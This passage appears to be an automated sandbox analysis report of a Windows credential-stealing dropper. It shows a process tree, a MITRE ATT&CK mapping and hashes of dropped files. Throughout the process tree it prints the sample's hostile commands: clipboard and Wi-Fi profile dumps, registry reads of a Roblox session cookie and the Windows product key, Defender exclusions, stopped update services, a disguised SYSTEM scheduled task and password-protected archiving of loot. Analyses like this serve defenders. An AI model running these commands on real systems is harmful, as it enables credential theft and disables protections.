AgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5616
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bqvvyvre\bqvvyvre.cmdline"
        10⤵
        
        PID:8176
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8875.tmp" "c:\Users\Admin\AppData\Local\Temp\bqvvyvre\CSC586C32FD3189442B8A39D18B3A3B645C.TMP"
        11⤵
        
        PID:6108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        8⤵
        
        PID:4472
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:5732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        8⤵
        
        PID:4960
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        9⤵
        
        PID:5720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:2684
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2908
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6096
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:5292
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7892
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7964
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:8024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:8040
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:8092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3120"
        8⤵
        
        PID:6260
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3120
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2336"
        8⤵
        
        PID:6436
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2336
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4800"
        8⤵
        
        PID:6572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4800
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 416"
        8⤵
        
        PID:6684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 416
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3208"
        8⤵
        
        PID:7388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3208
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4304"
        8⤵
        
        PID:6796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4304
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4328"
        8⤵
        
        PID:5812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4328
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:4628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        8⤵
        
        PID:5280
        
        C:\Windows\system32\getmac.exe
        
        getmac
        9⤵
        
        PID:7968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LRWWn.zip" *"
        8⤵
        
        PID:8048
        
        C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LRWWn.zip" *
        9⤵
        Executes dropped EXE
        
        PID:3700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        8⤵
        
        PID:5884
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        8⤵
        
        PID:3888
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        9⤵
        
        PID:2900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:5232
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:6188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        8⤵
        
        PID:5580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        
        PID:404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        8⤵
        
        PID:6308
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:6500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        8⤵
        
        PID:1464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        9⤵
        
        PID:1320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5384
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4468
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:6920
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:208
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1868
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2160
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:456
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1604
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1148
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6856
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:6836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6616
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6596
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:7044
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4044
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7540
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:6064
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:7268
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3996
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:7188
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:5792
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:7328
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4048
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:8120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3508

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3708

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3928

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4112

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4848

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3600

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:384

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2812

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:3496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:4396

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:4404

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:5112

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5932

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:6348

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:6516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\based.exe

Filesize
7.5MB

MD5
d9eb7fd115d5322c87c2cd11a99df343

SHA1
301bb836ed92f5bca358e6da08d824135c01608f

SHA256
0d1ff13243b82490d62f820a83e8ff834270ef8f847c85d0f567fe401dfd90d8

SHA512
2f7ac5f85e46cd51f6a3796961f7291126028eee89f04c8e16198914ea92aa824d42b532578d8845ad4a538e4832e3520c88220ae76f3db8f78001576b3f9978

Download Submit
C:\ProgramData\Microsoft\hacn.exe

Filesize
24.0MB

MD5
70d8f32540470db5df9d39deed7bd6cb

SHA1
a14147440736d4f1427193cd206f519890b9f2f2

SHA256
858bdc7b94a957a182492a2d21e096b2fb2ab5317ae9e3e882243ad80953227e

SHA512
522fc6bc180c5e9e7bc60ece7404162692f0a7902923465082cf5449bc9d2f247b8e7d60f7f0bf5a24bf98fc07826b743a49b71eba406f6073990c3355944870

Download Submit
C:\ProgramData\main.exe

Filesize
5.6MB

MD5
3d3c49dd5d13a242b436e0a065cd6837

SHA1
e38a773ffa08452c449ca5a880d89cfad24b6f1b

SHA256
e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf

SHA512
dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00

Download Submit
C:\ProgramData\setup.exe

Filesize
5.4MB

MD5
1274cbcd6329098f79a3be6d76ab8b97

SHA1
53c870d62dcd6154052445dc03888cdc6cffd370

SHA256
bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

SHA512
a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

Download Submit
C:\ProgramData\svchost.exe

Filesize
12.0MB

MD5
48b277a9ac4e729f9262dd9f7055c422

SHA1
d7e8a3fa664e863243c967520897e692e67c5725

SHA256
5c832eda59809a4f51dc779bb00bd964aad42f2597a1c9f935cfb37f0888ef17

SHA512
66dd4d1a82103cd90c113df21eb693a2bffde2cde41f9f40b5b85368d5a920b66c3bc5cadaf9f9d74dfd0f499086bedd477f593184a7f755b7b210ef5e428941

Download Submit
C:\ProgramData\шева.txt

Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\Build.exe

Filesize
31.6MB

MD5
08e1038e4d9273b8100d577e526dc44c

SHA1
99adb811149a471494cf072f57d9b5d8b9824673

SHA256
db9a6c0ecd67af93aa714c81d6e13e01d9cec44088cd1eef19d6311ba9fe318b

SHA512
c6c59e295f88651799173c110cd4ee655f9a4345ef53c7a739e5ec2b97bba04b4c7d82a90d7677869d477d7af1cd7b7671a3c70bea173b3c6c97d7386ef18c45

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_bz2.pyd

Filesize
48KB

MD5
83b5d1943ac896a785da5343614b16bc

SHA1
9d94b7f374030fed7f6e876434907561a496f5d9

SHA256
bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a

SHA512
5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_decimal.pyd

Filesize
106KB

MD5
0cfe09615338c6450ac48dd386f545fd

SHA1
61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe

SHA256
a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3

SHA512
42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_hashlib.pyd

Filesize
35KB

MD5
7edb6c172c0e44913e166abb50e6fba6

SHA1
3f8c7d0ff8981d49843372572f93a6923f61e8ed

SHA256
258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531

SHA512
2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_lzma.pyd

Filesize
85KB

MD5
71f0b9f90aa4bb5e605df0ea58673578

SHA1
c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e

SHA256
d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535

SHA512
fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_socket.pyd

Filesize
43KB

MD5
57dc6a74a8f2faaca1ba5d330d7c8b4b

SHA1
905d90741342ac566b02808ad0f69e552bb08930

SHA256
5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca

SHA512
5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\api-ms-win-core-console-l1-1-0.dll

Filesize
11KB

MD5
503107c27112ec911cfb4d9036e9ba2d

SHA1
565380e9a5f47634a9aed83ba8154895bde976d3

SHA256
f0662c9566ef712112a85a7fd11c96ad296a9571bd6953a756440186baaadb9d

SHA512
6e63cc5f8d459fed7324caabcafea156d6e73e85b2016f5e8691f0bf885bdad368e1ccf7c7c468144b6459ef72d8eb4a194aabdeba4fcd34d0a7e9338176f2ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\api-ms-win-core-datetime-l1-1-0.dll

Filesize
10KB

MD5
9d57e52ae71ed1c5d43f34848e40e7cb

SHA1
b53659a4f2a49b0605d171496e92482dccf9c616

SHA256
3f4fcc14e6d126bb6ec6ccc1f91632039c884916f1d2e4c03cedb6b6dd8ef85e

SHA512
0470a5b6d509f8df7c918a8516875980104c4a98d13dbee8188cb388d7c6687f71793fe5a7ea76042dd48040c5678301f4c7e910e965aa4dbf1727581c46b33e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\api-ms-win-core-debug-l1-1-0.dll

Filesize
10KB

MD5
f060bcb3c78c0cf55ec3785bc5883d23

SHA1
72fe582ef0469ccb42207f187fa4ea605badedd1

SHA256
203f3714e7d67970c7a31712d5ccd2fcd7b81806f33d35d214332aebab3b1860

SHA512
7fac846c391a750daf7e427441e6901c3805eefc6a0e4ee0d308f9e40dd1c1398a0b0abc0b320f66c2f336b683fba64a825c23c4ae0dfcd56ade3f7e227406d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
10KB

MD5
a73aab5ab512561781b64aef0fb35cb4

SHA1
386fc125dc8a75c5b22f624427a2692b05cf96db

SHA256
a8df626c1cf5a8b1674b80152c0f918b0614d3bde2187beb620845f35a6eb2e7

SHA512
2d409f259dd26f3fb6d6033789d6b312a8b09ea1aa8d12a73ac7cf7d070273c36f674b6711d0109ffe891778de8e3913b0bfa32464d1c323ff1cb4b1d9892032

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\api-ms-win-core-file-l1-1-0.dll

Filesize
14KB

MD5
ce6a226c3c6311ce8eb8a0fcf88088b5

SHA1
ff3b1c5aba77fd77f1a6e1605dcffa26422e0076

SHA256
a86f39bc492e9de3fb570d0836b0d6d07b642ffa63f0410298161134af7c898b

SHA512
3e9d28f10108e2cff08a02082035f0f7caec60dd57ea004f6862d2958bcfbb378a5d6172ce152ca9727a7263125f97a5c8a1810e5de61902a3536bed56a78085

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\api-ms-win-core-file-l1-2-0.dll

Filesize
10KB

MD5
e6b0bfdc2a7d1f78ef3d1396ffc4bdc4

SHA1
eeba46491e45d08c114f20c62e46149b2451e311

SHA256
